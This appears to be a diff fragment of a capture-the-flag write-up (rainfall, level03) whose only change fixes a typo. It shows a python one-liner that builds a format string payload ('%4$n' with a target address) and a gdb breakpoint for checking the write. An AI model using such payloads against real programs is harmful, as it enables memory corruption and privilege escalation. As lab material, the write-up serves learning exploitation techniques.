SERAC-SGM/rainfall-42/level03/README.md

     $ python -c 'print "\x8c\x98\x04\x08"+"%4$n"' > payload

 The syntax '%4$n' will change the 4th value without having to use the previous ones, since we only want to change this one.
-We set a breakpoint rihght after the printf call, to see if we successfully overflowed the register :
+We set a breakpoint right after the printf call, to see if we successfully overflowed the register :

     (gdb) b *0x080484da
     Breakpoint 1 at 0x80484da